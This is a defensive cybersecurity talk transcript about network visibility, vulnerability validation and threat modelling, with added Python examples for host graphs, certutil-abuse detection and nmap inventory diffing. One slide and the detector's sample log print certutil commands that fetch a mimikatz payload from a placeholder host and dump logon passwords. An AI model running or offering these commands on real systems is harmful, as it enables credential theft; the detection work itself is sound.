Regaining the High Ground

One of the main advantages that cyber defenders have over attackers is inside knowledge of their environment. Well, at least they're supposed to have it. It turns out that many organizations don't have that inside knowledge: the full picture of their IT environment. Without it, cyber defenders are hard pressed to hold onto the high ground; the battlefield is levelled. If an attacker gains access to the network (and is detected), a race begins to see who can discover vulnerabilities first and exploit or mitigate them. There is a lot of talk about "just doing the basics" to prevent such attacks and bolster your cybersecurity posture. Unfortunately, "the basics" aren't always easy. During this talk, we'll take a look at three basic – but not necessarily easy – steps to greatly improve your security posture: illuminate your environment, validate your vulnerabilities, and internalize external threats. Getting a handle on these processes and associated tools (demos included!) can help cyber defenders maintain – or regain – the high ground.

Steve Bowers

November 28, 2019
Transcript

  1. Sun Tzu Says… (2019-11-27, Regaining the High Ground, © 2019 Blue Team Cyber)

     "All armies love the high ground and hate the low, and prefer sunny places to dark and shade."
  2. How the good guys get owned…

     • Social engineering
     • Unpatched systems
     • Malware
  3. How the enemy takes the high ground…

     • Thinking in graphs instead of lists
     • Finding resources you don't know exist
     • Living off the land with built-in utilities
  4. Thinking in Graphs…

     • Asset lists, vulnerability spreadsheets, user directories… these are the lists that defenders usually use.
     • If one system is breached, what does that mean for other assets? Thinking in graphs helps us predict how many user accounts may be compromised, or which connections to other assets may be compromised, in case of a breach.
     • We need to move beyond creating lists of assets, users, etc., and look at the relationships between each.
     • Look at your network as an actual ecosystem, where business functions rely on systems, which rely on users; create these relationships to determine where the greatest threat lies, as well as the probability and impact of said threats.

     [Diagram: WebSrv, DB Srv, DC and Jump Box, connected by SSH, SQL and RDP edges.]

     Thinking in graphs helps attackers discover relationships between systems and applications, as well as user accounts, throughout a given environment. In contrast, many - if not most - defenders are still thinking in lists such as asset inventory and user accounts.
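As an added illustration (not part of Steve's deck), here are the diagram's hosts modelled as a small directed graph in Python; the edges and business dependencies are assumptions, and a breadth-first walk answers the slide's question of what else is exposed once one host is breached:

```python
# Added example (not from the original deck): model the slide's hosts as a
# directed graph and ask "if this host is breached, what else is exposed?"
# Edges and business dependencies are assumptions that resemble the slide's
# diagram (WebSrv, DB Srv, DC, Jump Box via SSH/SQL/RDP); not real data.
from collections import deque

# (source host, protocol, destination host): an attacker on the source has a
# network/credential route onto the destination.
EDGES = [
    ("Jump Box", "RDP", "WebSrv"),
    ("Jump Box", "SSH", "DB Srv"),
    ("WebSrv", "SQL", "DB Srv"),
    ("WebSrv", "SSH", "DB Srv"),
    ("DB Srv", "RDP", "DC"),
]

# Assumed mapping of business functions to the hosts they depend on.
BUSINESS_DEPS = {
    "Online orders": {"WebSrv", "DB Srv"},
    "Authentication": {"DC"},
    "Admin access": {"Jump Box"},
}


def build_graph(edges):
    graph = {}
    for src, proto, dst in edges:
        graph.setdefault(src, []).append((proto, dst))
        graph.setdefault(dst, [])
    return graph


def blast_radius(graph, breached):
    """Hosts reachable from `breached`, each with the hop path that gets there.
    Breadth-first search, so every recorded path is a shortest one."""
    paths = {breached: []}
    queue = deque([breached])
    while queue:
        host = queue.popleft()
        for proto, nxt in graph.get(host, []):
            if nxt not in paths:
                paths[nxt] = paths[host] + [f"{host} -{proto}-> {nxt}"]
                queue.append(nxt)
    return paths


def impacted_functions(reachable, deps=BUSINESS_DEPS):
    """Business functions with at least one dependency in the reachable set."""
    return sorted(f for f, hosts in deps.items() if hosts & set(reachable))
```

With these assumed edges, `blast_radius(build_graph(EDGES), "WebSrv")` shows the web server's breach reaching the DB server and then the DC, which is exactly the kind of chain a flat asset list never reveals.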
  5. Finding assets you don't know exist…

     Scans such as ARP scanning, Nmap, and vulnerability scans are performed by the bad guys once they get a foothold on the network. These are often scans that the defenders are not permitted to perform because they are considered "resource intensive" or "noisy".
  6. Living off the land…

     Remember when the bad guys had to import malware to pull payloads? Now tools like certutil can be used to download those bad applications! There are all kinds of built-in utilities that provide neat functionality for attackers to download malicious payloads and other goodies to further exploit systems and maintain persistence within your environment.

     Once the attacker gets in, they install malware in order to maintain persistence and exfiltrate data or perform other nefarious deeds… Or at least they used to. Now they can leverage tools built into the OS to do their bidding:

       C:\>certutil.exe -urlcache -split -f http://malurl.com/mimi-base64.exe
       C:\>certutil.exe -decode mimikatz-base64.exe mimikatz-decoded.exe
       C:\>mimikatz-decoded.exe
       mimikatz # sekurlsa::logonpasswords
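An added defender-side example, not from the deck: detection logic for the certutil download/decode pattern shown on this slide, run over constructed process-creation log lines in a made-up pipe-separated format (the parser and switch list are assumptions; adapt them to your own telemetry):

```python
# Added example (not from the original deck): flag the certutil download and
# decode pattern from the slide in process-creation logs. The log lines are
# constructed samples in a made-up "timestamp|host|user|command line" format;
# point parse_line() at whatever your EDR or Sysmon pipeline really emits.
import re

# Switches the slide shows certutil being abused with, and the alert reason.
SUSPICIOUS_SWITCHES = {
    "-urlcache": "remote download via certutil",
    "-decode": "base64 decode of a dropped file",
}

# Constructed sample log: the first two lines mirror the slide's commands.
SAMPLE_LOG = """\
2019-11-27T10:01:02|ws01|alice|certutil.exe -urlcache -split -f http://malurl.com/mimi-base64.exe
2019-11-27T10:01:09|ws01|alice|certutil.exe -decode mimikatz-base64.exe mimikatz-decoded.exe
2019-11-27T10:02:00|ws02|bob|certutil.exe -verify server.cer
2019-11-27T10:03:30|ws03|carol|notepad.exe notes.txt
"""

# Matches certutil whether given bare or with a Windows/POSIX path prefix.
CERTUTIL_RE = re.compile(r"(^|[\\/])certutil(\.exe)?$", re.IGNORECASE)


def parse_line(line):
    ts, host, user, cmd = line.split("|", 3)
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}


def classify(cmd):
    """Return the alert reason if `cmd` is certutil run with an abused switch,
    else None. Whitespace split is enough for these samples; a leading '/'
    is treated like '-' so either spelling of a switch is caught."""
    argv = cmd.split()
    if not argv or not CERTUTIL_RE.search(argv[0]):
        return None
    switches = {a.lower().replace("/", "-", 1) for a in argv[1:] if a[:1] in ("-", "/")}
    for switch, reason in SUSPICIOUS_SWITCHES.items():
        if switch in switches:
            return reason
    return None


def detect(log_text):
    """Run classify() over every line; return (host, user, reason) hits."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        reason = classify(rec["cmd"])
        if reason:
            hits.append((rec["host"], rec["user"], reason))
    return hits
```

The benign `-verify` invocation is deliberately left unflagged so the rule alerts on the abused switches rather than on every certutil launch.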
  7. Taking back the high ground

     • Illuminate your network
     • Validate your vulnerabilities
     • Internalize external threats
     • Shore up those holes!
  8. The OODA Loop (AKA: The Circle of Life)

     • Observe: Gather info about the current situation. This is where we collect "observables" from the environment that tell us whether or not there is something bad happening on our network/systems.
     • Orient: Contextualize the information to the current incident. We take the observables and apply business and IT context around them to determine the probability of the threat affecting your org, and what the impact may be.
     • Decide: Determine the next steps towards improvement. Settle on a course of action to remediate/mitigate the threat, lay out the actors/tasks, and assign roles and responsibilities.
     • Act: Execute based on the decision outcomes, i.e. the strategy devised in the Decide stage.
     • And start over… observe the outcomes from the actions, and move forward.
  9. Illuminate Your Environment: Compliance!

     NOTES
     • Looks like everything's running just tickety-boo. You know your flows, you've got your server enclaves built out, systems and IoT are running through proxies.
     • You've got a compliant environment: ticked all the boxes, got your staff trained up on security awareness videos, acceptable use policy is signed off, and your org charts are on lock.
     • Now, to dig a little deeper.
  10. Illuminate Your Environment: Chain of Command

     • Once you start looking more closely, you find…
     • Someone's running some shadow IT in the cloud to make it easier to store work files they'll need to work on at home.
     • Turns out there was a VIP coming to town, so someone stood up an office space with a separate wifi access point… and never took it down.
     • The IT squad has set up an impromptu lab to test gear and meet their objectives for next-gen conference rooms, and all of the gear is connecting to the Internet for its updates.
     • A developer is learning some new methods for extracting data, and decides to stand up a local instance of the DBMS, then connects it to the production DBMS to replicate some of the data.
     • Someone set up a VPN tunnel from home to be able to work remotely.
     • Buddy there decided that he wants remote access to his DMZ box, so he opens up port 3389 to remote into his IIS box.
     • The chain of command has changed over time, and a lot of the compliance checkboxes are moot, because things have become rather… ad hoc.
  11. How do we illuminate our networks? Just scan it.

     • Nmap to determine what's listening
     • VA scan to determine where you've got holes
     • Vulnerability scan to determine where you might have some oopsies
     • If you're worried about scans knocking stuff down, just scan subnet by subnet. Hopefully that means having a scanner in each subnet, but it might mean re-IP-ing a scanner (brutal, but I've seen it).
     • Use tools on the endpoint to help you gather required data
     • Send the data to a centralized data store for future analysis
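Added example (not the deck's own tooling) covering this slide and slide 5: parsing nmap's grepable (-oG) output and diffing it against an assumed asset inventory, so hosts you did not know existed and listeners nobody asked for (such as the port 3389 from slide 10) stand out. The scan output and the inventory are constructed samples:

```python
# Added example (not from the original deck): parse nmap grepable (-oG) output
# and diff it against the asset inventory, so hosts you did not know existed and
# listeners nobody asked for stand out. Scan output and inventory are constructed
# samples for illustration, not data from a real network.
import re

# Assumed inventory: IP -> ports the system owner says should be listening.
INVENTORY = {
    "10.0.0.5": {22, 80},   # WebSrv
    "10.0.0.9": {80, 443},  # DMZ IIS box
}

SAMPLE_NMAP_OG = """\
# Nmap 7.80 scan initiated Wed Nov 27 10:00:00 2019 as: nmap -oG - 10.0.0.0/28
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (998)
Host: 10.0.0.9 ()\tStatus: Up
Host: 10.0.0.9 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (997)
Host: 10.0.0.12 ()\tStatus: Up
Host: 10.0.0.12 ()\tPorts: 5432/open/tcp//postgresql///\tIgnored State: closed (999)
# Nmap done
"""

# One entry of the Ports field: port/state/proto/owner/service/rpc/version.
PORT_RE = re.compile(r"(\d+)/open/(tcp|udp)//([^/]*)/")


def parse_grepable(text):
    """Map each scanned IP to the set of ports nmap reported open."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        ip = line.split()[1]
        hosts.setdefault(ip, set())
        for m in re.finditer(r"Ports: (.*?)(?:\t|$)", line):
            hosts[ip].update(int(p) for p, _proto, _svc in PORT_RE.findall(m.group(1)))
    return hosts


def illuminate(scan, inventory=INVENTORY):
    """Return (hosts missing from inventory, {ip: open ports nobody expected})."""
    unknown = sorted(ip for ip in scan if ip not in inventory)
    unexpected = {}
    for ip, ports in scan.items():
        extra = ports - inventory.get(ip, set())
        if ip in inventory and extra:
            unexpected[ip] = sorted(extra)
    return unknown, unexpected
```

Feeding each subnet's scan through `illuminate()` and writing the results to the central data store is the "send the data somewhere for future analysis" step in code.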
  12. Validate Your Vulnerabilities

     • Vulnerability validation is a sweet science, not a button click.
     • Are you able to exploit the vulnerability?
     • How many hosts are vulnerable? If you've got 10,000 Flash vulnerabilities, you need to upgrade/remove Flash.
     • Where are the vulnerable hosts? If you've got 10 vulns, but they're internet facing… you need to test to see how easy they are to exploit, then mitigate.
     • Test your vulns: social engineering/phishing to gain access, pen testing to try to open up vulnerable hosts… run through your own personal kill chain.
     • Grab some artifacts while you're in there, eh? Help your team detect the type of activity that you're performing.

     In short:
     • # hosts affected
     • Affected host location
     • Identify known exploit traffic internally
     • PoC||GTFO
     • Pen test and gather artifacts
  13. Do we just let them in? Well, no…

     • Do your research
     • Monitor CTI feeds for IOCs/IOAs
     • Understand attacker TTPs
  14. Internalize External Threats

     NOTES
     • Why on earth would we want to do this? Because if we don't, someone else will.
     • Find the tools, tactics, and procedures that the bad guys might use against you and test them yourself against your infrastructure.
     • Human- and machine-based analysis will also prove handy here; don't just take information at face value.
     • From this comes your very own playbooks for defending your assets, testing your defences, and detecting those with ill intentions.
  15. Shore up Those Holes!

     • Build your own defensive TTPs
     • Whitelist apps and traffic
     • Maintain a central store of all discovery data and IOCs
     • Get a handle on who does what
     • Basically, just do the basics!
     • Not as easy as it sounds, obviously
     • Automate where possible!